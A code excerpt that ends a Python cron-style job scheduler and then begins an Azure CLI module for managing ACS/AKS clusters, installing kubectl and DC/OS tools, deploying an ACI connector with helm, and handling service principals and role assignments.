start_date=self.start_date,
stop_date=self.stop_date,
status='Y')
conn.execute(update)
pass
def _disable(self):
conn = db.connect()
update = self.table.update().values(stop_date=self.stop_date,
status='N')
conn.execute(update)
pass
def _exit(self):
return sys.exit()
def _terminate(self):
try:
os.kill(self.pid, signal.SIGTERM)
except OSError:
message = f'scheduler at PID {self.pid} was not found'
raise Warning(message)
pass
def _parse_console_arguments(self):
return [arg for arg in sys.argv[1:] if arg.startswith('-') is False]
def _parse_arguments(self):
parser = argparse.ArgumentParser()
parser.add_argument('--start', action='store_true', required=False)
parser.add_argument('--stop', action='store_true', required=False)
args, anons = parser.parse_known_args()
return args
def _start_signal_handlers(self):
logger.debug('Starting signal handlers...')
signal.signal(signal.SIGINT, lambda signum, frame: self._stop())
signal.signal(signal.SIGTERM, lambda signum, frame: self._stop())
logger.debug('Signal handlers started')
pass
def _start_executors(self):
logger.debug('Starting executors...')
for i in range(5):
name = f'Thread-Executor-{i}'
target = self._execute
thread = th.Thread(name=name, target=target, daemon=True)
thread.start()
self.executors.append(thread)
logger.debug(f'Executor {i} started as {thread.name}')
logger.debug('All executors started')
pass
def _start_maintainer(self):
logger.debug('Starting maintainer...')
name = 'Thread-Maintainer'
target = self._maintain
thread = th.Thread(name=name, target=target, daemon=True)
thread.start()
self.maintainer = thread
logger.debug(f'Maintainer started as {thread.name}...')
pass
def _synchronize(self):
logger.debug('Time will be synchronized')
self.moment = time.time()
logger.debug('Time was synchronized')
pass
def _increment(self):
self.moment += 1
pass
def _process(self):
self._read()
self._walk()
self._complete()
self._next()
pass
def _read(self):
try:
if self.schedule is None or int(self.moment) % 300 == 0:
self.schedule = dict(self._sked())
if self.schedule:
logger.debug(f'Schedule: {self.schedule}')
else:
logger.debug('Schedule is empty')
except Exception:
logger.error()
pass
def _walk(self):
now = time.localtime(self.moment)
for name, record in self.schedule.items():
try:
if (
record['status'] is True
and self._check(record['mday'], now.tm_mday) is True
and self._check(record['wday'], now.tm_wday+1) is True
and self._check(record['hour'], now.tm_hour) is True
and self._check(record['min'], now.tm_min) is True
and self._check(record['sec'], now.tm_sec) is True
):
self._register(name, self.moment)
except Exception:
logger.error()
pass
def _complete(self):
try:
if int(self.moment) % 86400 == 0:
logger.debug('Maintenance triggered')
self.maintenance.set()
except Exception:
logger.error()
pass
def _next(self):
delay = time.time()-self.moment
wait = 1-delay
try:
time.sleep(wait)
except ValueError:
logger.warning('TIME IS BROKEN')
self._synchronize()
else:
logger.debug(f'moment={self.moment}, delay={delay}, wait={wait}')
self._increment()
pass
def _sked(self):
logger.debug('Getting schedule...')
conn = db.connect()
table = db.tables.config
select = table.select()
result = conn.execute(select)
for row in result:
try:
name = row.control_name
status = True if row.status == 'Y' else False
schedule = {} if not row.schedule else json.loads(row.schedule)
record = {k: v for k, v in schedule.items()
if k in ['mday', 'wday', 'hour', 'min', 'sec']}
record['status'] = status
except Exception:
logger.warning()
continue
else:
yield name, record
logger.debug('Schedule retrieved')
pass
def _check(self, unit, now):
# Check if empty or *.
if unit is None or re.match(r'^(\*)$', unit) is not None:
return True
# Check if unit is lonely digit and equals to now.
elif re.match(r'^\d+$', unit) is not None:
unit = int(unit)
return True if now == unit else False
# Check if unit is a cycle and integer division with now is true.
elif re.match(r'^/\d+$', unit) is not None:
unit = int(re.search(r'\d+', unit).group())
if unit == 0:
return False
return True if now % unit == 0 else False
# Check if unit is a range and now is in this range.
elif re.match(r'^\d+-\d+$', unit) is not None:
unit = [int(i) for i in re.findall(r'\d+', unit)]
return True if now in range(unit[0], unit[1] + 1) else False
# Check if unit is a list and now is in this list.
elif re.match(r'^\d+,\s*\d+.*$', unit):
unit = [int(i) for i in re.findall(r'\d+', unit)]
return True if now in unit else False
# All other cases is not for the now.
else:
return False
pass
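# Illustrative evaluations of the branches in _check above (unit strings are
# hypothetical; 'now' is the current calendar value being tested):
#   self._check(None, 30)       -> True   # empty unit matches anything
#   self._check('*', 30)        -> True   # wildcard
#   self._check('15', 15)       -> True   # single value
#   self._check('/5', 25)       -> True   # cycle: 25 % 5 == 0
#   self._check('9-17', 12)     -> True   # inclusive range 9..17
#   self._check('1,15,30', 20)  -> False  # list that does not contain 20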
def _register(self, name, moment):
try:
logger.info(f'Adding control {name}[{moment}] to queue...')
self.queue.put((name, moment))
except Exception:
logger.error()
else:
logger.info(f'Control {name}[{moment}] was added to queue')
pass
def _execute(self):
while True:
if self.queue.empty() is False:
name, moment = self.queue.get()
logger.info(f'Initiating control {name}[{moment}]...')
try:
control = Control(name, timestamp=moment)
control.run()
except Exception:
logger.error()
else:
self.queue.task_done()
logger.info(f'Control {name}[{moment}] performed')
time.sleep(1)
pass
def _maintain(self):
while True:
if self.maintenance.is_set():
logger.info('Starting maintenance')
self._clean()
self.maintenance.clear()
logger.info('Maintenance performed')
break
time.sleep(1)
pass
def _clean(self):
conn = db.connect()
config = db.tables.config
select = config.select().order_by(config.c.control_id)
result = conn.execute(select)
for row in result:
control = Control(name=row.control_name)
control.clean()
pass
pass
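# Console usage implied by __init__ above: a bare positional argument spawns
# or terminates the detached scheduler process, while the --start/--stop
# flags are used by the spawned process itself.
#   python scheduler.py start    # fork a background scheduler (_create)
#   python scheduler.py stop     # terminate the recorded PID (_destroy)
#   python scheduler.py --start  # run the scheduling loop in this process
#
# A RAPO_CONFIG schedule value that _sked() would accept could look like
# (field names come from _sked, the syntax from _check; values are examples):
#   {"mday": "*", "wday": "1-5", "hour": "9-18", "min": "/15", "sec": "0"}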
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import random
import re
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
from ._helpers import _populate_api_server_access_profile, _set_load_balancer_sku, _set_vm_set_type
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from msrestazure.azure_exceptions import CloudError
import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core._profile import Profile
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from azure.mgmt.containerservice.v2019_08_01.models import ContainerServiceNetworkProfile
from azure.mgmt.containerservice.v2019_08_01.models import ContainerServiceLinuxProfile
from azure.mgmt.containerservice.v2019_08_01.models import ManagedClusterServicePrincipalProfile
from azure.mgmt.containerservice.v2019_08_01.models import ContainerServiceSshConfiguration
from azure.mgmt.containerservice.v2019_08_01.models import ContainerServiceSshPublicKey
from azure.mgmt.containerservice.v2019_08_01.models import ContainerServiceStorageProfileTypes
from azure.mgmt.containerservice.v2019_08_01.models import ManagedCluster
from azure.mgmt.containerservice.v2019_08_01.models import ManagedClusterAADProfile
from azure.mgmt.containerservice.v2019_08_01.models import ManagedClusterAddonProfile
from azure.mgmt.containerservice.v2019_08_01.models import ManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2019_08_01.models import ManagedClusterLoadBalancerProfile
from azure.mgmt.containerservice.v2019_08_01.models import ManagedClusterLoadBalancerProfileManagedOutboundIPs
from azure.mgmt.containerservice.v2019_08_01.models import ManagedClusterLoadBalancerProfileOutboundIPPrefixes
from azure.mgmt.containerservice.v2019_08_01.models import ManagedClusterLoadBalancerProfileOutboundIPs
from azure.mgmt.containerservice.v2019_08_01.models import AgentPool
from azure.mgmt.containerservice.v2019_08_01.models import ResourceReference
from azure.mgmt.containerservice.v2019_04_30.models import OpenShiftManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2019_04_30.models import OpenShiftAgentPoolProfileRole
from azure.mgmt.containerservice.v2019_04_30.models import OpenShiftManagedClusterIdentityProvider
from azure.mgmt.containerservice.v2019_04_30.models import OpenShiftManagedClusterAADIdentityProvider
from azure.mgmt.containerservice.v2019_04_30.models import OpenShiftManagedCluster
from azure.mgmt.containerservice.v2019_04_30.models import OpenShiftRouterProfile
from azure.mgmt.containerservice.v2019_04_30.models import OpenShiftManagedClusterAuthProfile
from azure.mgmt.containerservice.v2019_04_30.models import NetworkProfile
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=(url,))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
:param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
if orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
raise CLIError('Unsupported platform "{}" for the DC/OS CLI download.'.format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError('Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None):
"""Install kubectl, a command-line interface for Kubernetes clusters."""
source_url = "https://storage.googleapis.com/kubernetes-release/release"
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
if client_version == 'latest':
context = _ssl_context()
version = urlopen(source_url + '/stable.txt', context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = source_url + '/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
raise CLIError('Unsupported platform "{}" for the kubectl download.'.format(system))
logger.warning('Downloading client to "%s" from "%s"', install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError('Connection error while attempting to download client ({})'.format(ex))
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
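# Hypothetical direct invocation, for illustration; the install path is a
# placeholder and `cmd` is whatever CLI command context the caller already has:
#   k8s_install_cli(cmd, client_version='latest',
#                   install_location=os.path.expanduser('~/bin/kubectl'))
# It resolves 'latest' via <source_url>/stable.txt, downloads the matching
# kubectl binary for the current OS and marks it executable.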
def k8s_install_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("install", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def k8s_upgrade_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("upgrade", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def _k8s_install_or_upgrade_connector(helm_cmd, cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group):
from subprocess import PIPE, Popen
instance = client.get(resource_group_name, name)
helm_not_installed = 'Helm not detected, please verify if it is installed.'
url_chart = chart_url
if image_tag is None:
image_tag = 'latest'
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# If SPN is specified, the secret should also be specified
if service_principal is not None and client_secret is None:
raise CLIError('--client-secret must be specified when --service-principal is specified')
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, aci_resource_group or resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
# Validate the location against the available ACI regions
_validate_aci_location(norm_location)
# Get the credentials from an AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
subscription_id = get_subscription_id(cmd.cli_ctx)
# Get the TenantID
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, tenant_id = profile.get_login_credentials()
# Check if we want the linux connector
if os_type.lower() in ['linux', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Linux', instance.enable_rbac, instance.fqdn)
# Check if we want the windows connector
if os_type.lower() in ['windows', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Windows', instance.enable_rbac, instance.fqdn)
def _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, os_type, use_rbac, masterFqdn):
rbac_install = "true" if use_rbac else "false"
node_taint = 'azure.com/aci'
helm_release_name = connector_name.lower() + '-' + os_type.lower() + '-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
k8s_master = 'https://{}'.format(masterFqdn)
logger.warning("Deploying the ACI connector for '%s' using Helm", os_type)
try:
values = 'env.nodeName={},env.nodeTaint={},env.nodeOsType={},image.tag={},rbac.install={}'.format(
node_name, node_taint, os_type, image_tag, rbac_install)
if service_principal:
values += ",env.azureClientId=" + service_principal
if client_secret:
values += ",env.azureClientKey=" + client_secret
if subscription_id:
values += ",env.azureSubscriptionId=" + subscription_id
if tenant_id:
values += ",env.azureTenantId=" + tenant_id
if aci_resource_group:
values += ",env.aciResourceGroup=" + aci_resource_group
if norm_location:
values += ",env.aciRegion=" + norm_location
# Currently, we need to set the master FQDN.
# This is temporary and we should remove it when possible
values += ",env.masterUri=" + k8s_master
if helm_cmd == "install":
subprocess.call(["helm", "install", url_chart, "--name", helm_release_name, "--set", values])
elif helm_cmd == "upgrade":
subprocess.call(["helm", "upgrade", helm_release_name, url_chart, "--set", values])
except subprocess.CalledProcessError as err:
raise CLIError('Could not deploy the ACI connector Chart: {}'.format(err))
def k8s_uninstall_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, graceful=False, os_type='Linux'):
from subprocess import PIPE, Popen
helm_not_installed = "Error : Helm not detected, please verify if it is installed."
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# Get the credentials from an AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
if os_type.lower() in ['linux', 'both']:
helm_release_name = connector_name.lower() + '-linux-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
if os_type.lower() in ['windows', 'both']:
helm_release_name = connector_name.lower() + '-windows-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
def _undeploy_connector(graceful, node_name, helm_release_name):
if graceful:
logger.warning('Graceful option selected, will try to drain the node first')
from subprocess import PIPE, Popen
kubectl_not_installed = 'Kubectl not detected, please verify if it is installed.'
try:
Popen(["kubectl"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(kubectl_not_installed)
try:
drain_node = subprocess.check_output(
['kubectl', 'drain', node_name, '--force', '--delete-local-data'],
universal_newlines=True)
if not drain_node:
raise CLIError('Could not find the node, make sure you' +
' are using the correct --os-type')
except subprocess.CalledProcessError as err:
raise CLIError('Could not find the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
logger.warning("Undeploying the '%s' using Helm", helm_release_name)
try:
subprocess.call(['helm', 'del', helm_release_name, '--purge'])
except subprocess.CalledProcessError as err:
raise CLIError('Could not undeploy the ACI connector Chart: {}'.format(err))
try:
subprocess.check_output(
['kubectl', 'delete', 'node', node_name],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not delete the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _add_role_assignment(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
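# Back-off arithmetic in _add_role_assignment above, with the default delay=2:
# attempt x sleeps delay + delay * x = 2 + 2*x seconds, so the ten attempts
# wait 2, 4, ..., 20 seconds, roughly 110 seconds in the worst case, before
# the for/else falls through and the function returns False.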
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
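# Worked example of the prefix rule above (inputs are hypothetical):
#   name='99widgets', resource_group_name='prod_rg', subscription_id='01234567-...'
#   name_part           -> '99widgets' -> starts with a digit -> 'a99widgets'
#   resource_group_part -> 'prodrg'
#   result              -> 'a99widgets-prodrg-012345'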
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
